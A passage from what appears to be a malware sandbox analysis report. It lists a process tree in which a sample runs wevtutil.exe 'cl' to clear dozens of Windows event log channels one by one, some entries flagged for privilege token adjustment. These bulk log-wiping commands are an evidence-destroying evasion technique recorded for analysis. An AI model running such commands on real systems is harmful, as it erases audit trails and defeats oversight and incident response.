    - Suspicious use of AdjustPrivilegeToken
    PID:1908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationDS"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:680
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationDeviceProxy"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationMediaEngine"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPerformance"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:184
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPerformanceCore"
    3⤵
    PID:1148
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPipeline"
    3⤵
    PID:900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPlatform"
    3⤵
    PID:1308
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "MediaFoundationSrcPrefetch"
    3⤵
    PID:2316
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
    3⤵
    PID:1588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client/Admin"
    3⤵
    PID:2888
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client/Debug"
    3⤵
    PID:2636
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client/Operational"
    3⤵
    PID:2892
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
    3⤵
    PID:2468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
    3⤵
    PID:360
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
    3⤵
    PID:2852
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
    3⤵
    PID:500
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
    3⤵
    PID:3264
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IE/Diagnostic"
    3⤵
    PID:3652
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
    3⤵
    PID:1348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
    3⤵
    PID:376
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
    3⤵
    PID:3956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
    3⤵
    PID:1908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
    3⤵
    PID:2128
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"
    3⤵
    PID:580
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"
    3⤵
    PID:480
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"
    3⤵
    PID:2768
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"
    3⤵
    PID:2760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"
    3⤵
    PID:2164
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"
    3⤵
    PID:2464
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"
    3⤵
    PID:3672
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
    3⤵
    PID:2456
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
    3⤵
    PID:2448
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
    3⤵
    PID:2844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"
    3⤵
    PID:3952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AAD/Operational"
    3⤵
    PID:2304
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
    3⤵
    PID:4012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"
    3⤵
    PID:420
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
    3⤵
    PID:64
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
    3⤵
    PID:848
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
    3⤵
    PID:3116
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"
    3⤵
    PID:584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"
    3⤵
    PID:516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"
    3⤵
    PID:184
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"
    3⤵
    PID:2412
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"
    3⤵
    PID:1588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"
    3⤵
    PID:2888
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"
    3⤵
    PID:2636
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
    3⤵
    PID:2144
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
    3⤵
    PID:3172
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
    3⤵
    PID:3956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"
    3⤵
    PID:3832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"
    3⤵
    PID:1004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"
    3⤵
    PID:3272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"
    3⤵
    PID:1756
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"
    3⤵
    PID:1744
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"
    3⤵
    PID:2868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"
    3⤵
    PID:2880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"
    3⤵
    PID:2568
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"
    3⤵
    PID:2892
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"
    3⤵
    PID:996
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"
    3⤵
    PID:680
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppSruProv"
    3⤵
    PID:3136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"
    3⤵
    PID:3832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"
    3⤵
    PID:4080
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"
    3⤵
    PID:480
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
    3⤵
    PID:2268
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"
    3⤵
    PID:2868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"
    3⤵
    PID:3872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"
    3⤵
    PID:680
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"
    3⤵
    PID:3680
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
    3⤵
    PID:3984
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
    3⤵
    PID:3496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
    3⤵
    PID:3564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
    3⤵
    PID:1744
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
    3⤵
    PID:2568
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
    3⤵
    PID:2760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
    3⤵
    PID:3528
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
    3⤵
    PID:3472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
    3⤵
    PID:500
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
    3⤵
    PID:3992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
    3⤵
    PID:3832
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"
    3⤵
    PID:496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ApplicationResourceManagementSystem/Diagnostic"
    3⤵
    PID:516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ApplicationResourceManagementSystem/Operational"
    3⤵
    PID:184
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"
    3⤵
    PID:2436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"
    3⤵
    PID:3696
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"
    3⤵
    PID:3872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"
    3⤵
    PID:188
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"
    3⤵
    PID:732
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"
    3⤵
    PID:3988
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"
    3⤵
    PID:408
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"
    3⤵
    PID:3388
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
    3⤵
    PID:1516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"
    3⤵
    PID:2636
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Informational"
    3⤵
    PID:2712
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
    3⤵
    PID:3436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
    3⤵
    PID:3980
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"
    3⤵
    PID:3472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
    3⤵
    PID:3984
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
    3⤵
    PID:3496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
    3⤵
    PID:3432
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"
    3⤵
    PID:496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
    3⤵
    PID:3564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
    3⤵
    PID:184
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
    3⤵
    PID:2568
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
    3⤵
    PID:2760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
    3⤵
    PID:3528
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
    3⤵
    PID:732
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Backup"
    3⤵
    PID:3992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
    3⤵
    PID:3640
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
    3⤵
    PID:480
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"
    3⤵
    PID:2868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"
    3⤵
    PID:3392
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
    3⤵
    PID:3684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
    3⤵
    PID:3484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
    3⤵
    PID:3992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
    3⤵
    PID:1588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"
    3⤵
    PID:4108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"
    3⤵
    PID:4124
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"
    3⤵
    PID:4140
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
    3⤵
    PID:4204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
    3⤵
    PID:4228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
    3⤵
    PID:4260
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
    3⤵
    PID:4312
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
    3⤵
    PID:4344
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
    3⤵
    PID:4368
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
    3⤵
    PID:4384
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"
    3⤵
    PID:4404
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
    3⤵
    PID:4416
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
    3⤵
    PID:4428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"
    3⤵
    PID:4444
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
    3⤵
    PID:4460
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
    3⤵
    PID:4480
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
    3⤵
    PID:4496
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"
    3⤵
    PID:4512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"
    3⤵
    PID:4524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/Call"
    3⤵
    PID:4540
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"
    3⤵
    PID:4560
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"
    3⤵
    PID:4580
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"
    3⤵
    PID:4596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"
    3⤵
    PID:4612
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"
    3⤵
    PID:4624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
    3⤵
    PID:4640
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
    3⤵
    PID:4656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
    3⤵
    PID:4668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
    3⤵
    PID:4684
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
    3⤵
    PID:4700
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
    3⤵
    PID:4716
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CloudStorageWizard/Analytic"
    3⤵
    PID:4728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CloudStorageWizard/Operational"
    3⤵
    PID:4744
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"
    3⤵
    PID:4788
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"
    3⤵
    PID:4804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
    3⤵
    PID:4820
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
    3⤵
    PID:4836
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
    3⤵
    PID:4852
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
    3⤵
    PID:4868
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
    3⤵
    PID:4888
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"
    3⤵
    PID:4900
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"
    3⤵
    PID:4916
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"
    3⤵
    PID:4932
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"
    3⤵
    PID:4948
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"
    3⤵
    PID:4964
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"
    3⤵
    PID:4980
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"
    3⤵
    PID:4996
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"
    3⤵
    PID:5012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"
    3⤵
    PID:5028
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
    3⤵
    PID:5044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
    3⤵
    PID:5060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"
    3⤵
    PID:5076
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"
    3⤵
    PID:5092
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
    3⤵
    PID:5108
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
    3⤵
    PID:3992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"
    3⤵
    PID:4116
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
    3⤵
    PID:4128
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"
    3⤵
    PID:4148
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"
    3⤵
    PID:4212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
    3⤵
    PID:4232
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"
    3⤵
    PID:4264
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"
    3⤵
    PID:4316
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"
    3⤵
    PID:4348
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"
    3⤵
    PID:4372
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
    3⤵
    PID:4388
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"
    3⤵
    PID:4412
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
    3⤵
    PID:4416
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
    3⤵
    PID:4428
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"
    3⤵
    PID:4472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"
    3⤵
    PID:4492
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"
    3⤵
    PID:4504
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
    3⤵
    PID:4516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"
    3⤵
    PID:4528
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"
    3⤵
    PID:4548
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"
    3⤵
    PID:4568
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
    3⤵
    PID:4588
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DSC/Admin"
    3⤵
    PID:4604
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"
    3⤵
    PID:4612
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DSC/Debug"
    3⤵
    PID:4624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DSC/Operational"
    3⤵
    PID:4648
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
    3⤵
    PID:4656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
    3⤵
    PID:4668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
    3⤵
    PID:4692
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
    3⤵
    PID:4704
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
    3⤵
    PID:4724
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"
    3⤵
    PID:4736
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"
    3⤵
    PID:4748
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"
    3⤵
    PID:4792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
    3⤵
    PID:4808
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
    3⤵
    PID:4824
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
    3⤵
    PID:4840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"
    3⤵
    PID:4856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"
    3⤵
    PID:4880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"
    3⤵
    PID:4892
- - C:\Windows\system32\wevtutil.exe
